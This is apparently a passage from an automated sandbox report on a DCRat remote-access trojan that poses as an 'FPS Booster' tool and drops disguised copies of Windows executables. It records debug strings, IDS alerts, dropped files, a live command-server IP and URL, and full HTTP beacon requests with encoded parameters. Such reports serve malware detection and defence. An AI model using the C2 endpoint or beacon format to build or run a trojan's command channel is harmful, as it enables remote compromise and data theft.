                    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdbRSDS source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdb2e source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000BC6000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdb1qt.PDB source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\exe\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000BE5000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbx source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdbRSDS source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: RunPE_MemoryProtection.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: HPOo`C:\Windows\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000B95000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\Microsoft.VisualStudio.Threading.pdbpdbing.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000B95000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdbpdb source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.Core.ni.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: Microsoft.VisualBasic.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: System.Core.pdbPSp source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: ?[oC:\Users\user\Desktop\Microsoft.VisualStudio.Threading.pdbJ source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: inaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: mscorlib.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: symbols\exe\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: Microsoft.VisualStudio.Threading.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Users\user\Desktop\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbs source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000B95000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: mscorlib.ni.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbS source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb97` source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: E:\A\_work\40\s\obj\Microsoft.VisualStudio.Threading\Release\net45\Microsoft.VisualStudio.Threading.pdbXX@ source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C41000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Core.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Windows\exe\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbLLt source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.ni.pdb source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: @[o.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455288288.00000000008F9000.00000004.00000010.00020000.00000000.sdmp
                    Source: Binary string: System.Core.ni.pdbRSDS source: WER2082.tmp.dmp.6.dr
                    Source: Binary string: \??\C:\Windows\symbols\exe\Microsoft.VisualStudio.Threading.pdb source: UNFOT5F1qt.exe, 00000000.00000002.1455647318.0000000000C00000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Code function: 7_2_00406301 FindFirstFileW,FindClose, 7_2_00406301
                    Source: C:\Users\user\AppData\Local\Temp\FPS Booster 2.0.7.exe | Code function: 7_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 7_2_00406CC7
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Code function: 4x nop then dec eax 5_2_00007FF887B2109D
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Code function: 4x nop then jmp 00007FF887B272C8h 5_2_00007FF887B26BD2
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Code function: 4x nop then jmp 00007FF887B27A8Fh 5_2_00007FF887B26BD2
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Code function: 4x nop then jmp 00007FF887B27A8Fh 5_2_00007FF887B26BE5
                    Source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe | Code function: 4x nop then jmp 00007FF887B27A8Fh 5_2_00007FF887B27560
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Code function: 4x nop then dec eax 17_2_00007FF887B3109D
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Code function: 4x nop then jmp 00007FF887B372C8h 17_2_00007FF887B36BE5
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Code function: 4x nop then jmp 00007FF887B37A8Fh 17_2_00007FF887B36BE5
                    Source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe | Code function: 4x nop then jmp 00007FF887B37A8Fh 17_2_00007FF887B37560
                    Source: C:\Windows\regedit\explorer.exe | Code function: 4x nop then dec eax 18_2_00007FF887B4109D
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Code function: 4x nop then dec eax 19_2_00007FF887B5109D
                    Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe | Code function: 4x nop then dec eax 23_2_00007FF887B2109D
                    Source: C:\Windows\regedit\explorer.exe | Code function: 4x nop then dec eax 27_2_00007FF887C6109D

                    Networking

                    Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49746 -> 188.120.228.203:80
                    Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49723 -> 188.120.228.203:80
                    Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49785 -> 188.120.228.203:80
                    Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49767 -> 188.120.228.203:80
                    Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49827 -> 188.120.228.203:80
                    Source: Network traffic | Suricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.9:49806 -> 188.120.228.203:80
                    Source: C:\Windows\regedit\explorer.exe | Network Connect: 188.120.228.203 80
                    Source: Malware configuration extractor | URLs: http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/@==AbhNnclZXauVHdsVXYmVGZ
                    Source: Yara match | File source: 5.0.savesbrokerDriverSavesbroker.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, type: DROPPED
                    Source: Yara match | File source: C:\Windows\SysWOW64\MsRdpWebAccess\WerFault.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\savesbrokerDriverSavesbroker.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\Public\Pictures\RuntimeBroker.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\Default\WmiPrvSE.exe, type: DROPPED
                    Source: Yara match | File source: C:\Windows\regedit\explorer.exe, type: DROPPED
                    Source: Joe Sandbox View | ASN Name: THEFIRST-ASRU THEFIRST-ASRU
                    Source: global traffic | HTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI HTTP/1.1
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1
                        Host: 188.120.228.203
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&u94aa9EjMqWeOdgENIA88=a3V2bxddqzBJK7Zui3PhuF6&uzM88ZiIqBiAFihRGs9gdFSiockHtb7=7WHmkffRQ2dI HTTP/1.1
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Version/11.0 Mobile/15A5341f Safari/604.1
                        Host: 188.120.228.203
                    Source: global traffic | HTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t HTTP/1.1
                        Accept: */*
                        Content-Type: text/plain
                        User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
                        Host: 188.120.228.203
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXKVlgV1rJUk18ntWeDto2=ehI8yOvjOVLkpjdj5bnrkCHcyD&VUNJCpiqydhhm6jGOqX8J25HRAKN=ZpKuVZPAMJ5G3pF&3BvB63waEtcZG=BeVOYxXxQgUGChc2QNztX9ZLfg3t HTTP/1.1
                        Accept: */*
                        Content-Type: text/plain
                        User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
                        Host: 188.120.228.203
                    Source: global traffic | HTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY HTTP/1.1
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                        Host: 188.120.228.203
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&x7sAZ9s8LIMWmsWdYRkexiMsvuP818e=MsDQCmtwup8&WOQPE7JGakLPu9OpuuGMn3K4oG=viytIjYVgdA44zY HTTP/1.1
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                        Host: 188.120.228.203
                    Source: global traffic | HTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN HTTP/1.1
                        Accept: */*
                        Content-Type: text/csv
                        User-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)
                        Host: 188.120.228.203
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&iXlp95Y2OIhl=j2BPpjdF4opH2L&pCeLVPpGxY9MMAtCHVPqjeDNU=Qnt5hGtlMMnVQK3wN0qXQFLliw&fNL8Q1g9CW202ckxhZwE=wwQN HTTP/1.1
                        Accept: */*
                        Content-Type: text/csv
                        User-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)
                        Host: 188.120.228.203
                    Source: global traffic | HTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx HTTP/1.1
                        Accept: */*
                        Content-Type: text/javascript
                        User-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1
                        Host: 188.120.228.203
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&8zuOabaF=gPSN2e2E7Tr63&qfhjpvFDRBKGR2CDKyYQ=FUKx HTTP/1.1
                        Accept: */*
                        Content-Type: text/javascript
                        User-Agent: Mozilla/5.0 (iPhone9,4; U; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1
                        Host: 188.120.228.203
                    Source: global traffic | HTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?k1RxxsMic1WB03Lj3Jl0wy=eC69X&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&k1RxxsMic1WB03Lj3Jl0wy=eC69X HTTP/1.1
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
                        Host: 188.120.228.203
                        Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/coresupport/Cpubinphpmessage/framescriptdata/MathPref/log/Camtracelimitmessage/htop/defaultuniversal.php?k1RxxsMic1WB03Lj3Jl0wy=eC69X&ffd48bee5da8b25eec2684a6d45165e4=0e446e6e149043ae2bd68e78c935f694&bb9ca7a84d5d6bb1b5c819b5ece77831=gNllDM4UmYkRjM0MGOjhzN1IWOzMjM5Q2M1IDMjZzNwMDOwgzM4UTO&k1RxxsMic1WB03Lj3Jl0wy=eC69X HTTP/1.1
                        Accept: */*
                        Content-Type: text/css
                        User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G960F Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36
                        Host: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.120.228.203
                    Source: WerFault.exe, 00000011.00000002.1426473572.0000000002851000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000011.00000002.1426473572.0000000002875000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000011.00000002.1426473572.0000000002869000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.00000000029E9000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.00000000029FE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.00000000025CA000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.00000000025B4000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://188.120.228.203
                    Source: savesbrokerDriverSavesbroker.exe, 00000005.00000002.1397323956.0000000002BF0000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000011.00000002.1426473572.00000000026A0000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000011.00000002.1426473572.0000000002845000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.1476991915.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000013.00000002.1476965095.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.00000000029CD000.00000004.00000800.00020000.00000000.sdmp, HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1520715428.0000000002868000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.0000000002438000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.1777779055.0000000002599000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://188.120.228.203/MathpoolCam/ru
                    Source: HSZUYllrTVQhIRaXpKBgYbmVnCoTc.exe, 00000017.00000002.1518926243.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://188.120.228.203/MathpoolCam/rulemessagerecord/screeX
                    Source: explorer.exe, 0000001B.00000002.1777779055.0000000002599000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://188.120.228.203/MathpoolCam/rulemessagerecord/screenscript/binAutomessage/Prefantitrace/cores
                    Source: FPS Booster 2.0.7.exe.2.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
